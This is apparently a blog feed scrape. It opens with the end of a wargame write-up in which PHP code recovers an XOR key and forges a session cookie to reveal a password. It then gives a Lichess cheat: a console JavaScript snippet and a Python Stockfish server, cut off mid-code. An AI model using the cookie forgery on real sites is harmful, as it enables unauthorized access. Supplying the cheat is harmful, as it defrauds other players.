<span class="k">for</span><span class="p">(</span><span class="nv">$i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$i</span> <span class="o"><</span> <span class="nb">strlen</span><span class="p">(</span><span class="nv">$s1</span><span class="p">);</span> <span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nv">$res</span> <span class="o">.=</span> <span class="nv">$s1</span><span class="p">[</span><span class="nv">$i</span><span class="p">]</span> <span class="o">^</span> <span class="nv">$s2</span><span class="p">[</span><span class="nv">$i</span><span class="p">];</span>
<span class="p">}</span>
<span class="k">echo</span> <span class="nv">$res</span><span class="o">.</span><span class="s2">"</span><span class="se">\n</span><span class="s2">"</span><span class="p">;</span>
<span class="k">echo</span> <span class="nb">bin2hex</span><span class="p">(</span><span class="nv">$res</span><span class="p">)</span><span class="o">.</span><span class="s2">"</span><span class="se">\n</span><span class="s2">"</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// finding out the key</span>
<span class="nx">xstrings</span><span class="p">(</span><span class="nb">base64_decode</span><span class="p">(</span><span class="s2">"ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw="</span><span class="p">),</span>
<span class="nb">json_encode</span><span class="p">(</span><span class="k">array</span><span class="p">(</span> <span class="s2">"showpassword"</span><span class="o">=></span><span class="s2">"no"</span><span class="p">,</span> <span class="s2">"bgcolor"</span><span class="o">=></span><span class="s2">"#ffffff"</span><span class="p">)));</span>
<span class="c1">// the above function outputs</span>
<span class="c1">// qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq</span>
<span class="c1">// 7177384a7177384a7177384a7177384a7177384a7177384a7177384a7177384a7177384a7177384a71</span>
<span class="c1">// we can easily see that the xor key must be 'qw8J'</span>
<span class="nv">$key</span> <span class="o">=</span> <span class="s1">'qw8J'</span><span class="p">;</span>
<span class="c1">// generate the new data with the key</span>
<span class="k">echo</span> <span class="s1">'Submit the following as the "data" cookie to gain access: '</span><span class="o">.</span><span class="nx">encodeData</span><span class="p">(</span><span class="k">array</span><span class="p">(</span><span class="s2">"showpassword"</span><span class="o">=></span><span class="s2">"yes"</span><span class="p">,</span> <span class="s2">"bgcolor"</span><span class="o">=></span><span class="s2">"#ffffff"</span><span class="p">),</span> <span class="nv">$key</span><span class="p">)</span><span class="o">.</span><span class="s2">"</span><span class="se">\n</span><span class="s2">"</span><span class="p">;</span>
<span class="cp">?></span><span class="x"></span>
</code></pre></div>
<p>Here a screenshot of the message you get when submitting the generated
cookie:</p>
<p><img alt="Screenshot - 10.09.2015 -16:32:49" src="https://incolumitas.com/uploads/2015/09/Screenshot-10.09.2015-163249-1024x484.png"></p>Cross platform Lichess Cheat2015-08-12T23:24:00+02:002015-01-10T14:01:00+01:00Nikolai Tschachertag:incolumitas.com,2015-08-12:/2015/08/12/cross-platform-lichess-cheat/<h2>Edit: Cheat updated on 1.10.2015</h2>
<p><strong>Visit <a href="https://incolumitas.com/pages/lichess-bot/">Lichess Bot Projects Page</a> for the newest information for this bot!</strong>
The description and code below will probably not work anymore!</p>
<hr>
<p>Hello Everyone</p>
<p>Once in a while I like to <a href="http://lichess.org">play Chess on lichess</a>.
But sometimes I get beat up tot harshly, such that I want to take some
revenge :D. Recently I created a new cheat for lichess. You can find the
whole source code on my <a href="https://github.com/NikolaiT/lichess_cheat">lichess cheat github
repository.</a> If you want to
use the cheat, please follow the following tutorial:</p>
<ol>
<li>Download and install Python 3.4 (or newer) for your operating system
from here: <a href="https://www.python.org/downloads/">python web site</a></li>
<li>Add Python to your system path such that you can open python file
from anywhere (This step depends on what operating system you are
using)</li>
<li>Then download the python cheat from
<a href="https://github.com/NikolaiT/lichess_cheat">here</a>. It is the file
with the <strong>.py</strong> suffix</li>
<li>Then execute the python cheat file where you downloaded it. Just go
to the directory where you saved it and enter in a shell: <code>`python
cheat_server.py</code></li>
<li>Open your browser (tested with chrome and firefox) and add the HTTP
proxy server in the network settings that is outputted in the …</li></ol><h2>Edit: Cheat updated on 1.10.2015</h2>
<p><strong>Visit <a href="https://incolumitas.com/pages/lichess-bot/">Lichess Bot Projects Page</a> for the newest information for this bot!</strong>
The description and code below will probably not work anymore!</p>
<hr>
<p>Hello Everyone</p>
<p>Once in a while I like to <a href="http://lichess.org">play Chess on lichess</a>.
But sometimes I get beat up tot harshly, such that I want to take some
revenge :D. Recently I created a new cheat for lichess. You can find the
whole source code on my <a href="https://github.com/NikolaiT/lichess_cheat">lichess cheat github
repository.</a> If you want to
use the cheat, please follow the following tutorial:</p>
<ol>
<li>Download and install Python 3.4 (or newer) for your operating system
from here: <a href="https://www.python.org/downloads/">python web site</a></li>
<li>Add Python to your system path such that you can open python file
from anywhere (This step depends on what operating system you are
using)</li>
<li>Then download the python cheat from
<a href="https://github.com/NikolaiT/lichess_cheat">here</a>. It is the file
with the <strong>.py</strong> suffix</li>
<li>Then execute the python cheat file where you downloaded it. Just go
to the directory where you saved it and enter in a shell: <code>`python
cheat_server.py</code></li>
<li>Open your browser (tested with chrome and firefox) and add the HTTP
proxy server in the network settings that is outputted in the Bash
shell when you executed <code>python cheat_server.py</code></li>
<li>Then login to lichess and start a new game in which you want to
cheat. The cheat should now show you the best moves with a red
border around the chess squares</li>
<li></li>
</ol>
<p>For a <strong>video tutorial</strong>l watch the following video: <em>will follow soon</em></p>
<p>For all who are interested in the working of the cheat: You need to know
Python and Javascript. Python code downloads the stockfish engine and
starts a interactive process and communicates with the stockfish binary
over UCI. Then the engine is exposed via a simple web server that the
Javascript cheat makes use of.</p>
<p>Previous cheats didn't intercept the network traffic between the lichess
server and the browser. But new versions make use of <a href="https://github.com/abhinavsingh/proxy.py">the proxy.py
module</a>. Using a proxy has
many advantages such as being able to modify any javascript logic.</p>
<p>Have a nice one.</p>
<p>Cheers</p>
<h2>The code</h2>
<h3>Javascript cheat to paste in the Browser Console after Python Cheat was run</h3>
<div class="highlight"><pre><span></span><code><span class="cm">/**</span>
<span class="cm"> *</span>
<span class="cm"> * https://github.com/NikolaiT/lichess_cheat</span>
<span class="cm"> *</span>
<span class="cm"> * Just copy paste this file into your browsers javascript console.</span>
<span class="cm"> * Make sure the cheat_server.py is running on your localhost before!</span>
<span class="cm"> *</span>
<span class="cm"> * Author = Nikolai Tschacher</span>
<span class="cm"> * Date = Summer 2015</span>
<span class="cm"> * Contact = incolumitas.com</span>
<span class="cm"> */</span>
<span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">allMoves</span> <span class="o">=</span> <span class="s1">''</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">incrementTime</span> <span class="o">=</span> <span class="nb">parseInt</span><span class="p">(</span><span class="sr">/\+([0-9]+)/g</span><span class="p">.</span><span class="nx">exec</span><span class="p">(</span><span class="nx">$</span><span class="p">(</span><span class="s1">'span.setup'</span><span class="p">).</span><span class="nx">text</span><span class="p">())[</span><span class="mf">1</span><span class="p">]);</span>
<span class="kd">var</span> <span class="nx">ply</span> <span class="o">=</span> <span class="o">-</span><span class="mf">1</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">uci</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">playerColor</span> <span class="o">=</span> <span class="nx">$</span><span class="p">(</span><span class="s1">'.cg-board'</span><span class="p">).</span><span class="nx">hasClass</span><span class="p">(</span><span class="s1">'orientation-black'</span><span class="p">)</span> <span class="o">?</span> <span class="s1">'black'</span> <span class="o">:</span> <span class="s1">'white'</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">debug</span> <span class="o">=</span> <span class="kc">true</span><span class="p">;</span>
<span class="kd">function</span> <span class="nx">addEngineProposalClass</span><span class="p">()</span> <span class="p">{</span>
<span class="nx">$</span><span class="p">(</span><span class="s2">""</span><span class="p">)</span>
<span class="p">.</span><span class="nx">prop</span><span class="p">(</span><span class="s2">"type"</span><span class="p">,</span> <span class="s2">"text/css"</span><span class="p">)</span>
<span class="p">.</span><span class="nx">html</span><span class="p">(</span><span class="s2">" </span>
<span class="s2"> .engineProposal { </span>
<span class="s2"> border-color: #FF4D4D; </span>
<span class="s2"> border-width: 3px; </span>
<span class="s2"> border-style: solid; </span>
<span class="s2"> }; </span>
<span class="s2"> .enginePonderProposal { </span>
<span class="s2"> border-color: #5CADFF; </span>
<span class="s2"> border-width: 2px; </span>
<span class="s2"> border-style: solid; </span>
<span class="s2"> }"</span><span class="p">)</span>
<span class="p">.</span><span class="nx">appendTo</span><span class="p">(</span><span class="s2">"head"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">highlightEngineProposal</span><span class="p">(</span><span class="nx">engineMove</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">bfrom</span> <span class="o">=</span> <span class="nx">engineMove</span><span class="p">.</span><span class="nx">best</span><span class="p">.</span><span class="nx">slice</span><span class="p">(</span><span class="mf">0</span><span class="p">,</span> <span class="mf">2</span><span class="p">),</span>
<span class="nx">bto</span> <span class="o">=</span> <span class="nx">engineMove</span><span class="p">.</span><span class="nx">best</span><span class="p">.</span><span class="nx">slice</span><span class="p">(</span><span class="mf">2</span><span class="p">,</span> <span class="mf">4</span><span class="p">),</span>
<span class="nx">pfrom</span> <span class="o">=</span> <span class="nx">engineMove</span><span class="p">.</span><span class="nx">ponder</span><span class="p">.</span><span class="nx">slice</span><span class="p">(</span><span class="mf">0</span><span class="p">,</span> <span class="mf">2</span><span class="p">),</span>
<span class="nx">pto</span> <span class="o">=</span> <span class="nx">engineMove</span><span class="p">.</span><span class="nx">ponder</span><span class="p">.</span><span class="nx">slice</span><span class="p">(</span><span class="mf">2</span><span class="p">,</span> <span class="mf">4</span><span class="p">);</span>
<span class="nx">$</span><span class="p">(</span><span class="s1">'.cg-square'</span><span class="p">).</span><span class="nx">removeClass</span><span class="p">(</span><span class="s1">'engineProposal'</span><span class="p">);</span>
<span class="nx">$</span><span class="p">(</span><span class="s1">'.cg-square'</span><span class="p">).</span><span class="nx">removeClass</span><span class="p">(</span><span class="s1">'enginePonderProposal'</span><span class="p">);</span>
<span class="nx">$</span><span class="p">(</span><span class="s1">'.cg-square.'</span> <span class="o">+</span> <span class="nx">bfrom</span><span class="p">).</span><span class="nx">addClass</span><span class="p">(</span><span class="s1">'engineProposal'</span><span class="p">);</span>
<span class="nx">$</span><span class="p">(</span><span class="s1">'.cg-square.'</span> <span class="o">+</span> <span class="nx">bto</span><span class="p">).</span><span class="nx">addClass</span><span class="p">(</span><span class="s1">'engineProposal'</span><span class="p">);</span>
<span class="nx">$</span><span class="p">(</span><span class="s1">'.cg-square.'</span> <span class="o">+</span> <span class="nx">pfrom</span><span class="p">).</span><span class="nx">addClass</span><span class="p">(</span><span class="s1">'enginePonderProposal'</span><span class="p">);</span>
<span class="nx">$</span><span class="p">(</span><span class="s1">'.cg-square.'</span> <span class="o">+</span> <span class="nx">pto</span><span class="p">).</span><span class="nx">addClass</span><span class="p">(</span><span class="s1">'enginePonderProposal'</span><span class="p">);</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">getLastMove</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">function</span> <span class="nx">getMove</span><span class="p">(</span><span class="nx">s</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">s</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="sr">/[a-h][0-8]/g</span><span class="p">);</span> <span class="p">};</span>
<span class="k">try</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">to</span> <span class="o">=</span> <span class="nx">getMove</span><span class="p">(</span><span class="nx">$</span><span class="p">(</span><span class="s1">'.cg-square.last-move.occupied'</span><span class="p">).</span><span class="nx">attr</span><span class="p">(</span><span class="s1">'class'</span><span class="p">));</span>
<span class="kd">var</span> <span class="kr">from</span> <span class="o">=</span> <span class="nx">getMove</span><span class="p">(</span><span class="nx">$</span><span class="p">(</span><span class="s1">'.cg-square.last-move'</span><span class="p">).</span><span class="nx">not</span><span class="p">(</span><span class="s1">'.occupied'</span><span class="p">).</span><span class="nx">attr</span><span class="p">(</span><span class="s1">'class'</span><span class="p">));</span>
<span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="s1">''</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">return</span> <span class="kr">from</span><span class="o">+</span><span class="nx">to</span><span class="p">;</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">getRemainingTime</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">time</span> <span class="o">=</span> <span class="nx">$</span><span class="p">(</span><span class="s1">'.clock_'</span> <span class="o">+</span> <span class="nx">playerColor</span> <span class="o">+</span> <span class="s1">' .time'</span><span class="p">).</span><span class="nx">text</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">minutes</span> <span class="o">=</span> <span class="nb">parseInt</span><span class="p">(</span><span class="sr">/^([0-9]*?):/g</span><span class="p">.</span><span class="nx">exec</span><span class="p">(</span><span class="nx">time</span><span class="p">)[</span><span class="mf">1</span><span class="p">]);</span>
<span class="k">return</span> <span class="nx">minutes</span> <span class="o">*</span> <span class="mf">60</span> <span class="o">+</span> <span class="nb">parseInt</span><span class="p">(</span><span class="nx">time</span><span class="p">.</span><span class="nx">slice</span><span class="p">(</span><span class="o">-</span><span class="mf">2</span><span class="p">));</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">getEngineMoveByAllMoves</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">bestMoves</span> <span class="o">=</span> <span class="s1">''</span><span class="p">;</span>
<span class="nx">$</span><span class="p">.</span><span class="nx">ajax</span><span class="p">({</span>
<span class="c1">// /allMoves/e2e4 e7e5/incrementTime/1/remainingTime/60/</span>
<span class="nx">url</span><span class="o">:</span> <span class="s2">"http://localhost:8888/allMoves/"</span> <span class="o">+</span> <span class="nx">allMoves</span> <span class="o">+</span> <span class="s2">"/incrementTime/"</span> <span class="o">+</span> <span class="nx">incrementTime</span> <span class="o">+</span> <span class="s2">"/remainingTime/"</span> <span class="o">+</span> <span class="nx">getRemainingTime</span><span class="p">()</span> <span class="o">+</span> <span class="s2">"/"</span><span class="p">,</span>
<span class="nx">success</span><span class="o">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">html</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">bestMoves</span> <span class="o">=</span> <span class="nx">html</span><span class="p">;</span>
<span class="p">},</span>
<span class="k">async</span><span class="o">:</span><span class="kc">false</span>
<span class="p">});</span>
<span class="k">return</span> <span class="p">{</span>
<span class="s1">'best'</span><span class="o">:</span> <span class="nx">bestMoves</span><span class="p">.</span><span class="nx">slice</span><span class="p">(</span><span class="mf">0</span><span class="p">,</span> <span class="mf">4</span><span class="p">),</span>
<span class="s1">'ponder'</span><span class="o">:</span> <span class="nx">bestMoves</span><span class="p">.</span><span class="nx">slice</span><span class="p">(</span><span class="mf">5</span><span class="p">,</span><span class="mf">9</span><span class="p">)</span>
<span class="p">};</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">isMyTurn</span><span class="p">()</span> <span class="p">{</span>
<span class="k">return</span> <span class="p">(</span><span class="nx">playerColor</span> <span class="o">===</span> <span class="s1">'white'</span> <span class="o">&&</span> <span class="p">(</span><span class="nx">ply</span> <span class="o">%</span> <span class="mf">2</span> <span class="o">===</span> <span class="mf">0</span><span class="p">))</span> <span class="o">||</span>
<span class="p">(</span><span class="nx">playerColor</span> <span class="o">===</span> <span class="s1">'black'</span> <span class="o">&&</span> <span class="p">(</span><span class="nx">ply</span> <span class="o">%</span> <span class="mf">2</span> <span class="o">===</span> <span class="mf">1</span><span class="p">));</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">showEngineMove</span><span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">isMyTurn</span><span class="p">())</span> <span class="p">{</span>
<span class="nx">engineMoves</span> <span class="o">=</span> <span class="nx">getEngineMoveByAllMoves</span><span class="p">();</span>
<span class="nx">highlightEngineProposal</span><span class="p">(</span><span class="nx">engineMoves</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">addEngineProposalClass</span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">playerColor</span> <span class="o">===</span> <span class="s1">'black'</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">uci</span> <span class="o">=</span> <span class="s1">''</span><span class="p">;</span>
<span class="nx">ply</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">setInterval</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">lastMove</span> <span class="o">=</span> <span class="nx">getLastMove</span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">uci</span> <span class="o">!==</span> <span class="nx">lastMove</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// new next move!</span>
<span class="nx">uci</span> <span class="o">=</span> <span class="nx">lastMove</span><span class="p">;</span>
<span class="nx">ply</span><span class="o">++</span><span class="p">;</span>
<span class="nx">allMoves</span> <span class="o">+=</span> <span class="p">(</span><span class="s1">' '</span> <span class="o">+</span> <span class="nx">uci</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">debug</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">playerColor</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s2">"My turn: "</span> <span class="o">+</span> <span class="nx">isMyTurn</span><span class="p">());</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">allMoves</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">ply</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">uci</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">showEngineMove</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">},</span> <span class="mf">75</span><span class="p">);</span>
<span class="p">})();</span>
</code></pre></div>
<h3>This python file downloads and runs stockfish and must be run first</h3>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python3</span>
<span class="c1"># https://github.com/NikolaiT/lichess_cheat</span>
<span class="c1"># Implements a RESTful Api to the stockfish engine.</span>
<span class="c1"># You may call this RESTful API with a request as the follows:</span>
<span class="c1"># http://localhost:8888/allMoves/e2e4 e7e5/incrementTime/1/remainingTime/60/</span>
<span class="c1"># All times are in seconds.</span>
<span class="n">__author__</span> <span class="o">=</span> <span class="s1">'Nikolai Tschacher'</span>
<span class="n">__contact__</span> <span class="o">=</span> <span class="s1">'incolumitas.com'</span>
<span class="n">__date__</span> <span class="o">=</span> <span class="s1">'Summer 2015'</span>
<span class="kn">import</span> <span class="nn">subprocess</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="kn">import</span> <span class="nn">random</span>
<span class="kn">import</span> <span class="nn">urllib.request</span>
<span class="kn">from</span> <span class="nn">urllib.parse</span> <span class="kn">import</span> <span class="n">unquote</span>
<span class="kn">from</span> <span class="nn">http.server</span> <span class="kn">import</span> <span class="n">BaseHTTPRequestHandler</span><span class="p">,</span> <span class="n">HTTPServer</span>
<span class="kn">import</span> <span class="nn">socketserver</span>
<span class="kn">import</span> <span class="nn">zipfile</span>
<span class="kn">import</span> <span class="nn">pprint</span>
<span class="n">config</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'stockfish_download_link'</span><span class="p">:</span> <span class="s1">'https://stockfish.s3.amazonaws.com/stockfish-6-</span><span class="si">{}</span><span class="s1">.zip'</span><span class="p">,</span>
<span class="s1">'stockfish_binary'</span> <span class="p">:</span> <span class="s1">''</span><span class="p">,</span> <span class="c1"># the path to your local stockfish binary</span>
<span class="s1">'pwd'</span><span class="p">:</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">dirname</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">realpath</span><span class="p">(</span><span class="vm">__file__</span><span class="p">)),</span>
<span class="s1">'debug'</span><span class="p">:</span> <span class="kc">True</span><span class="p">,</span>
<span class="s1">'thinking_time'</span><span class="p">:</span> <span class="mi">1</span><span class="p">,</span>
<span class="s1">'max_thinking_time'</span><span class="p">:</span> <span class="mi">2</span><span class="p">,</span> <span class="c1"># in seconds</span>
<span class="p">}</span>
<span class="k">def</span> <span class="nf">unzip</span><span class="p">(</span><span class="n">source_filename</span><span class="p">,</span> <span class="n">dest_dir</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Taken from:</span>
<span class="sd"> http://stackoverflow.com/questions/12886768/how-to-unzip-file-in-python-on-all-oses</span>
<span class="sd"> """</span>
<span class="k">with</span> <span class="n">zipfile</span><span class="o">.</span><span class="n">ZipFile</span><span class="p">(</span><span class="n">source_filename</span><span class="p">)</span> <span class="k">as</span> <span class="n">zf</span><span class="p">:</span>
<span class="k">for</span> <span class="n">member</span> <span class="ow">in</span> <span class="n">zf</span><span class="o">.</span><span class="n">infolist</span><span class="p">():</span>
<span class="c1"># Path traversal defense copied from</span>
<span class="c1"># http://hg.python.org/cpython/file/tip/Lib/http/server.py#l789</span>
<span class="n">words</span> <span class="o">=</span> <span class="n">member</span><span class="o">.</span><span class="n">filename</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">'/'</span><span class="p">)</span>
<span class="n">path</span> <span class="o">=</span> <span class="n">dest_dir</span>
<span class="k">for</span> <span class="n">word</span> <span class="ow">in</span> <span class="n">words</span><span class="p">[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]:</span>
<span class="n">drive</span><span class="p">,</span> <span class="n">word</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">splitdrive</span><span class="p">(</span><span class="n">word</span><span class="p">)</span>
<span class="n">head</span><span class="p">,</span> <span class="n">word</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="n">word</span><span class="p">)</span>
<span class="k">if</span> <span class="n">word</span> <span class="ow">in</span> <span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">curdir</span><span class="p">,</span> <span class="n">os</span><span class="o">.</span><span class="n">pardir</span><span class="p">,</span> <span class="s1">''</span><span class="p">):</span> <span class="k">continue</span>
<span class="n">path</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">word</span><span class="p">)</span>
<span class="n">zf</span><span class="o">.</span><span class="n">extract</span><span class="p">(</span><span class="n">member</span><span class="p">,</span> <span class="n">path</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">install_stockfish</span><span class="p">():</span>
<span class="sd">"""</span>
<span class="sd"> Grabs the latest stockfish binary and installs it besides the script.</span>
<span class="sd"> """</span>
<span class="n">dl</span> <span class="o">=</span> <span class="n">config</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'stockfish_download_link'</span><span class="p">)</span>
<span class="n">binary_path</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">if</span> <span class="n">os</span><span class="o">.</span><span class="n">name</span> <span class="o">==</span> <span class="s1">'nt'</span><span class="p">:</span>
<span class="n">dl</span> <span class="o">=</span> <span class="n">dl</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="s1">'windows'</span><span class="p">)</span>
<span class="n">binary_path</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">config</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'pwd'</span><span class="p">),</span> <span class="s1">'Windows</span><span class="se">\\</span><span class="s1">stockfish-6-64.exe'</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">os</span><span class="o">.</span><span class="n">name</span> <span class="o">==</span> <span class="s1">'posix'</span> <span class="ow">and</span> <span class="n">sys</span><span class="o">.</span><span class="n">platform</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="s1">'linux'</span><span class="p">):</span>
<span class="n">dl</span> <span class="o">=</span> <span class="n">dl</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="s1">'linux'</span><span class="p">)</span>
<span class="n">binary_path</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">config</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'pwd'</span><span class="p">),</span> <span class="s1">'stockfish-6-linux/Linux/stockfish-6-linux/Linux/stockfish_6_x64'</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">sys</span><span class="o">.</span><span class="n">platform</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="s1">'darwin'</span><span class="p">):</span>
<span class="n">dl</span> <span class="o">=</span> <span class="n">dl</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="s1">'mac'</span><span class="p">)</span>
<span class="n">binary_path</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">config</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'pwd'</span><span class="p">),</span> <span class="s1">'stockfish-6-mac/Mac/stockfish-6-64'</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">exit</span><span class="p">(</span><span class="s1">'System </span><span class="si">{}</span><span class="s1"> is not supported.'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">name</span><span class="p">))</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">exists</span><span class="p">(</span><span class="n">binary_path</span><span class="p">):</span>
<span class="n">save_in</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">config</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'pwd'</span><span class="p">),</span> <span class="s1">'stockfish.zip'</span><span class="p">)</span>
<span class="n">request</span> <span class="o">=</span> <span class="n">urllib</span><span class="o">.</span><span class="n">request</span><span class="o">.</span><span class="n">URLopener</span><span class="p">()</span>
<span class="n">request</span><span class="o">.</span><span class="n">retrieve</span><span class="p">(</span><span class="n">dl</span><span class="p">,</span> <span class="n">save_in</span><span class="p">)</span>
<span class="n">unzip</span><span class="p">(</span><span class="n">save_in</span><span class="p">,</span> <span class="n">config</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'pwd'</span><span class="p">))</span>
<span class="n">os</span><span class="o">.</span><span class="n">unlink</span><span class="p">(</span><span class="n">save_in</span><span class="p">)</span>
<span class="k">if</span> <span class="n">sys</span><span class="o">.</span><span class="n">platform</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="s1">'linux'</span><span class="p">)</span> <span class="ow">or</span> <span class="n">sys</span><span class="o">.</span><span class="n">platform</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="s1">'darwin'</span><span class="p">):</span>
<span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">(</span><span class="s1">'chmod +x </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">binary_path</span><span class="p">))</span>
<span class="n">config</span><span class="p">[</span><span class="s1">'stockfish_binary'</span><span class="p">]</span> <span class="o">=</span> <span class="n">binary_path</span>
<span class="k">if</span> <span class="n">config</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'debug'</span><span class="p">,</span> <span class="kc">False</span><span class="p">):</span>
<span class="n">pprint</span><span class="o">.</span><span class="n">pprint</span><span class="p">(</span><span class="n">config</span><span class="p">)</span>
<span class="k">class</span> <span class="nc">StockfishEngine</span><span class="p">():</span>
<span class="sd">"""Implements all engine related stuff"""</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">stockfish_plays_white</span><span class="o">=</span><span class="kc">True</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Sets the engine up.</span>
<span class="sd"> stockfish_plays_white determines whether stockfish is white or black. If</span>
<span class="sd"> stockfish is white, it needs to make the first move.</span>
<span class="sd"> thinking_time controls how much time stockfish is given to calculate its moves.</span>
<span class="sd"> max_thinking_time determines the maximum thinking time the engine has.</span>
<span class="sd"> """</span>
<span class="bp">self</span><span class="o">.</span><span class="n">max_thinking_time</span> <span class="o">=</span> <span class="n">config</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'max_thinking_time'</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">thinking_time</span> <span class="o">=</span> <span class="n">config</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'thinking_time'</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span>
